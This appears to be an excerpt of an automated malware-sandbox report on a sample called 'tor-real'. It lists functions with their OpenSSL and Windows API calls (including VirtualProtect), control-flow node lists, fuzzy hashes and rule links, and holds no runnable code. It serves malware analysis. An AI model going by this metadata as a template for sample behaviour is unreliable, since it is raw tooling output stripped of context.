                                                                              • Part of subcall function 6C1B3130: CRYPTO_new_ex_data.LIBCRYPTO-1_1 ref: 6C1B3183
                                                                              • Part of subcall function 6C1B3130: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C1B318C
                                                                            • BIO_clear_flags.LIBCRYPTO-1_1 ref: 6C1BA22D
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C1BA245
                                                                            • GetLastError.KERNEL32 ref: 6C1BA258
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C1BA281
                                                                            • ERR_add_error_data.LIBCRYPTO-1_1 ref: 6C1BA2AD
                                                                            • _errno.MSVCRT ref: 6C1BA2B8
                                                                            • _errno.MSVCRT ref: 6C1BA2BF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C1BA2EF
                                                                            • fclose.MSVCRT ref: 6C1BA303
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiR_put_errorWide_errno$D_lock_newErrorLastO_clear_flagsO_ctrlO_newO_new_ex_dataO_zallocR_add_error_datafclosestrchrstrlen
                                                                            • String ID: N$m
                                                                            • API String ID: 496359561-1202619803
                                                                            • Opcode ID: 00da3daad443020bd3e5953158e9f2842ba62017610531270f89efd18a816652
                                                                            • Instruction ID: cf0c2680487567334771b98c13a242e291cd8361977502d7d7fd044ce62b943f
                                                                            • Opcode Fuzzy Hash: 00da3daad443020bd3e5953158e9f2842ba62017610531270f89efd18a816652
                                                                            • Instruction Fuzzy Hash: FA3101B55087009FD300AF66C58571FBAE0BF85708F41882DE5D95BB51DBBA8498CF93
                                                                            Function 6C2AC7D0 Relevance: 18.1, APIs: 12, Instructions: 137filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_errnofopenstrlen$_wfopen
                                                                            • String ID:
                                                                            • API String ID: 3461520518-0
                                                                            • Opcode ID: 837d79803dca49988825914ae9d9a590e6f953989ebfc3600273cbec3274fb24
                                                                            • Instruction ID: a27f68f1590a3cf12ff39267fca64161c0f135e91852a11b2b0167507c6dfc4a
                                                                            • Opcode Fuzzy Hash: 837d79803dca49988825914ae9d9a590e6f953989ebfc3600273cbec3274fb24
                                                                            • Instruction Fuzzy Hash: B74103B090830ADFDB04EFA9C58465EBBF4BF89748F01892EE89497640E7759845CF92
                                                                            Function 6C3440B0 Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 95 6c3440b0-6c3440c3 96 6c3440c5-6c3440cc 95->96 97 6c3440d0-6c344119 call 6c344740 call 6c344950 95->97 97->96 102 6c34411b-6c344124 97->102 103 6c3441c0-6c3441c2 102->103 104 6c34412a 102->104 105 6c3442c0 103->105 106 6c3441c8-6c3441d5 103->106 107 6c34412f-6c344131 104->107 108 6c3442c5-6c3442cb 105->108 109 6c344308 106->109 110 6c3441db-6c3441e6 106->110 107->108 111 6c344137-6c34413c 107->111 108->96 112 6c3442d1 108->112 115 6c344312-6c34434f call 6c343ef0 EnterCriticalSection 109->115 110->107 111->108 113 6c344142-6c344148 111->113 114 6c3442d8-6c3442fd call 6c343f50 112->114 113->115 116 6c34414e-6c344157 113->116 130 6c3442ff 114->130 125 6c344385-6c34439c LeaveCriticalSection 115->125 126 6c344351-6c34435d 115->126 118 6c34417f-6c3441a0 116->118 119 6c344159 116->119 122 6c3441f0-6c344227 call 6c343f50 118->122 123 6c3441a2-6c3441a5 118->123 119->96 122->118 141 6c34422d 122->141 127 6c3441a7-6c3441aa 123->127 128 6c344160-6c34416e call 6c343f50 123->128 131 6c344360-6c344370 TlsGetValue GetLastError 126->131 132 6c344290-6c3442b1 call 6c343f50 127->132 133 6c3441b0-6c3441bb call 6c343ef0 127->133 147 6c344170-6c344179 128->147 135 6c344230-6c344237 130->135 137 6c344372-6c344374 131->137 138 6c34437e-6c344383 131->138 132->147 133->103 135->96 142 6c34423d-6c344249 135->142 137->138 144 6c344376-6c344379 137->144 138->125 138->131 141->135 146 6c344250-6c344260 142->146 144->138 148 6c344262-6c344279 VirtualProtect 146->148 149 6c34427c-6c344285 146->149 147->118 147->135 148->149 149->146 150 6c344287-6c34428e 149->150
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 880799bda47228141357e0e919934f43ad448887272ada59ff8402abc4087351
                                                                            • Instruction ID: 6ba466386e7c2f72ea2f18ad0cd348ba7c6342fe0054f26a706058d7ddf6804c
                                                                            • Opcode Fuzzy Hash: 880799bda47228141357e0e919934f43ad448887272ada59ff8402abc4087351
                                                                            • Instruction Fuzzy Hash: 1571F376A012158FCB10DF69D48064AB7F5FF5A348F15CA26D994A7B05D331E805CF92
                                                                            Function 6C0EB890 Relevance: 1.7, APIs: 1, Instructions: 173COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 311 6c0eb890-6c0eb8a3 312 6c0eb8a5-6c0eb8ac 311->312 313 6c0eb8b0-6c0eb8f9 call 6c0ebf20 call 6c0ec130 311->313 313->312 318 6c0eb8fb-6c0eb904 313->318 319 6c0eb90a 318->319 320 6c0eb9a0-6c0eb9a2 318->320 323 6c0eb90f-6c0eb911 319->323 321 6c0eb9a8-6c0eb9b5 320->321 322 6c0ebaa0 320->322 325 6c0eb9bb-6c0eb9c6 321->325 326 6c0ebae8-6c0ebaed 321->326 324 6c0ebaa5-6c0ebaab 322->324 323->324 327 6c0eb917-6c0eb91c 323->327 324->312 328 6c0ebab1 324->328 325->323 327->324 329 6c0eb922-6c0eb928 327->329 330 6c0ebab8-6c0ebadd call 6c0eb730 328->330 331 6c0eb92e-6c0eb937 329->331 332 6c0ebaf2-6c0ebb02 call 6c0eb6d0 329->332 344 6c0ebadf 330->344 335 6c0eb95f-6c0eb980 331->335 336 6c0eb939 331->336 338 6c0eb982-6c0eb985 335->338 339 6c0eb9d0-6c0eba07 call 6c0eb730 335->339 336->312 341 6c0eb987-6c0eb98a 338->341 342 6c0eb940-6c0eb94e call 6c0eb730 338->342 339->335 353 6c0eba0d 339->353 345 6c0eba70-6c0eba91 call 6c0eb730 341->345 346 6c0eb990-6c0eb99b call 6c0eb6d0 341->346 356 6c0eb950-6c0eb959 342->356 348 6c0eba10-6c0eba17 344->348 345->356 346->320 348->312 354 6c0eba1d-6c0eba29 348->354 353->348 355 6c0eba30-6c0eba40 354->355 358 6c0eba5c-6c0eba65 355->358 359 6c0eba42-6c0eba59 VirtualProtect 355->359 356->335 356->348 358->355 360 6c0eba67-6c0eba6e 358->360 359->358
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e70e79345b1e9df4a923e1dc36b06c1d053d2ca7cc688cbda22c3116a81289ec
                                                                            • Instruction ID: 16f2245fdcb10d5114c702caafbea502a835efbd0e554cf30eca3e034f9ba111
                                                                            • Opcode Fuzzy Hash: e70e79345b1e9df4a923e1dc36b06c1d053d2ca7cc688cbda22c3116a81289ec
                                                                            • Instruction Fuzzy Hash: DF519E72B4531ACFCB10DF28C48078ABBF1FB8E308F59856AD854ABB45D730A905DB95
                                                                            Function 6C0EB9CB Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 361 6c0eb9cb-6c0eb9cf 362 6c0eb9d0-6c0eba07 call 6c0eb730 361->362 365 6c0eb95f-6c0eb980 362->365 366 6c0eba0d 362->366 365->362 367 6c0eb982-6c0eb985 365->367 368 6c0eba10-6c0eba17 366->368 369 6c0eb987-6c0eb98a 367->369 370 6c0eb940-6c0eb94e call 6c0eb730 367->370 371 6c0eba1d-6c0eba29 368->371 372 6c0eb8a5-6c0eb8ac 368->372 374 6c0eba70-6c0eba91 call 6c0eb730 369->374 375 6c0eb990-6c0eb9a2 call 6c0eb6d0 369->375 382 6c0eb950-6c0eb959 370->382 373 6c0eba30-6c0eba40 371->373 378 6c0eba5c-6c0eba65 373->378 379 6c0eba42-6c0eba59 VirtualProtect 373->379 374->382 386 6c0eb9a8-6c0eb9b5 375->386 387 6c0ebaa0 375->387 378->373 383 6c0eba67-6c0eba6e 378->383 379->378 382->365 382->368 389 6c0eb9bb-6c0eb9c6 386->389 390 6c0ebae8-6c0ebaed 386->390 388 6c0ebaa5-6c0ebaab 387->388 388->372 391 6c0ebab1 388->391 389->388 394 6c0eb917-6c0eb91c 389->394 393 6c0ebab8-6c0ebadd call 6c0eb730 391->393 401 6c0ebadf 393->401 394->388 396 6c0eb922-6c0eb928 394->396 398 6c0eb92e-6c0eb937 396->398 399 6c0ebaf2-6c0ebb02 call 6c0eb6d0 396->399 398->365 402 6c0eb939 398->402 401->368 402->372
                                                                            APIs
                                                                              • Part of subcall function 6C0EB730: VirtualQuery.KERNEL32 ref: 6C0EB7BB
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0912A5), ref: 6C0EBA57
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery
                                                                            • String ID:
                                                                            • API String ID: 1027372294-0
                                                                            • Opcode ID: 591c5431613e521c53a53f0f4c424a79b53d8f24450ebb15f1554815489c7022
                                                                            • Instruction ID: d0afed3f5811e5d890d16d6ffe32712c6c955c5f64011ece3997a6c9f8c31f5e
                                                                            • Opcode Fuzzy Hash: 591c5431613e521c53a53f0f4c424a79b53d8f24450ebb15f1554815489c7022
                                                                            • Instruction Fuzzy Hash: 75113676F1131A8FCF14CF28C88068AB7F1BF89304F16856AD95963745E730B9068B84
                                                                            Function 6C0EBA96 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 404 6c0eba96-6c0ebaab 407 6c0eb8a5-6c0eb8ac 404->407 408 6c0ebab1 404->408 409 6c0ebab8-6c0ebadd call 6c0eb730 408->409 412 6c0ebadf 409->412 412->407 414 6c0eba1d-6c0eba29 412->414 415 6c0eba30-6c0eba40 414->415 416 6c0eba5c-6c0eba65 415->416 417 6c0eba42-6c0eba59 VirtualProtect 415->417 416->415 418 6c0eba67-6c0eba6e 416->418 417->416
                                                                            APIs
                                                                              • Part of subcall function 6C0EB730: VirtualQuery.KERNEL32 ref: 6C0EB7BB
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0912A5), ref: 6C0EBA57
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery
                                                                            • String ID:
                                                                            • API String ID: 1027372294-0
                                                                            • Opcode ID: 971efbffe1cf8ef3f5ff5f18011108e24d2fdb9aafe77bc09dd25c086a5d7d18
                                                                            • Instruction ID: b9004d4c8e4218a10a7f451d016c27767a6c825101782745649ae4253fe5da3e
                                                                            • Opcode Fuzzy Hash: 971efbffe1cf8ef3f5ff5f18011108e24d2fdb9aafe77bc09dd25c086a5d7d18
                                                                            • Instruction Fuzzy Hash: CE110376A4571ACFCF20CF18C88478AB7F1FB89318F19885AC99967705D730BA468B81

                                                                            Non-executed Functions

                                                                            Function 6C0AE670 Relevance: 89.8, APIs: 50, Strings: 1, Instructions: 542COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_free$Y_free$D_sizeL_sk_pushO_mallocO_zallocX509X509_freeX509_get0_pubkeyd2i_memcpy
                                                                            • String ID: A
                                                                            • API String ID: 557718904-3554254475
                                                                            • Opcode ID: 2e0d1062bbadc25eeb870577d1eb8db5bd1b9005d69767c530471ed4b7a98b17
                                                                            • Instruction ID: 7094fd57d695485323dedad5f98dfd76e673cdadc11f8ecc9cc3b30877c40327
                                                                            • Opcode Fuzzy Hash: 2e0d1062bbadc25eeb870577d1eb8db5bd1b9005d69767c530471ed4b7a98b17
                                                                            • Instruction Fuzzy Hash: 6E4223B12097429FD3009FA4C48475EBBF0BF89348F508E1DE4E89BB51D778E9468B86
                                                                            Function 6C0BAD60 Relevance: 65.0, APIs: 27, Strings: 10, Instructions: 300stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_error$O_reallocstrncmp$M_read_bioO_ctrlO_newO_s_filememcpystrlen
                                                                            • String ID: FOR$A$ERIN$ERIN$FO F$FOV2$OR $SERV$SERV$l
                                                                            • API String ID: 3095373799-598870608
                                                                            • Opcode ID: 4ad274938bf5a0ddb9c7874a794ec723945790a615a9aa4e0e77fe2d2c6ca6ac
                                                                            • Instruction ID: 24e5eeb2fa93369194234f9d848651945fcdea9c712be2384f4d8589c9f40b8b
                                                                            • Opcode Fuzzy Hash: 4ad274938bf5a0ddb9c7874a794ec723945790a615a9aa4e0e77fe2d2c6ca6ac
                                                                            • Instruction Fuzzy Hash: 41E1DEB46083469FD301DF65C48475FBBE0BF89308F50891DE5D8AB750DBB9EA488B86
                                                                            Function 6C0DA647 Relevance: 51.4, APIs: 26, Strings: 3, Instructions: 668COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0DA7EE
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0DA7FD
                                                                            • HMAC_CTX_new.LIBCRYPTO-1_1 ref: 6C0DA806
                                                                            • EVP_CIPHER_CTX_iv_length.LIBCRYPTO-1_1 ref: 6C0DA917
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0DAB45
                                                                            • RAND_bytes.LIBCRYPTO-1_1 ref: 6C0DABC8
                                                                            • time.MSVCRT ref: 6C0DAC85
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DACC1
                                                                            • CRYPTO_memdup.LIBCRYPTO-1_1 ref: 6C0DACF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_new$D_bytesD_sizeO_freeO_mallocO_memdupX_iv_lengthtime
                                                                            • String ID: $@$A
                                                                            • API String ID: 3790227056-2820341008
                                                                            • Opcode ID: 124c7c3383ca4acecb65b200e13a4fee016c04a1cf1e8b10d31beb04574bd839
                                                                            • Instruction ID: 7e8be72ca44a9abfeb45c1fe79c9c111b03a5c9900429e7cc4c36b6d7c5e3b78
                                                                            • Opcode Fuzzy Hash: 124c7c3383ca4acecb65b200e13a4fee016c04a1cf1e8b10d31beb04574bd839
                                                                            • Instruction Fuzzy Hash: D862D0B46093419FD750DF29C18475EBBF0BF88748F61892DE9988B751E778E848CB82
                                                                            Function 6C0B2675 Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A69
                                                                              • Part of subcall function 6C0ACAE0: OPENSSL_init_crypto.LIBCRYPTO-1_1 ref: 6C0ACB14
                                                                              • Part of subcall function 6C0A5120: CRYPTO_THREAD_run_once.LIBCRYPTO-1_1 ref: 6C0A5132
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0B26DA
                                                                            • CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C0B2727
                                                                            • OPENSSL_LH_new.LIBCRYPTO-1_1 ref: 6C0B2770
                                                                            • X509_STORE_new.LIBCRYPTO-1_1 ref: 6C0B2780
                                                                            • CTLOG_STORE_new.LIBCRYPTO-1_1 ref: 6C0B2790
                                                                              • Part of subcall function 6C0A90D0: OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A90DE
                                                                              • Part of subcall function 6C0A90D0: CONF_parse_list.LIBCRYPTO-1_1 ref: 6C0A9111
                                                                              • Part of subcall function 6C0A90D0: OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A9120
                                                                              • Part of subcall function 6C0A9280: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A9355
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B27FA
                                                                            • X509_VERIFY_PARAM_new.LIBCRYPTO-1_1 ref: 6C0B2807
                                                                            • EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0B2821
                                                                            • EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0B283B
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B284E
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0B2861
                                                                            • CRYPTO_new_ex_data.LIBCRYPTO-1_1 ref: 6C0B2889
                                                                            • CRYPTO_secure_zalloc.LIBCRYPTO-1_1 ref: 6C0B28AD
                                                                            • RAND_bytes.LIBCRYPTO-1_1 ref: 6C0B28F2
                                                                            • RAND_priv_bytes.LIBCRYPTO-1_1 ref: 6C0B291A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B299F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B29CB
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A07
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A9F
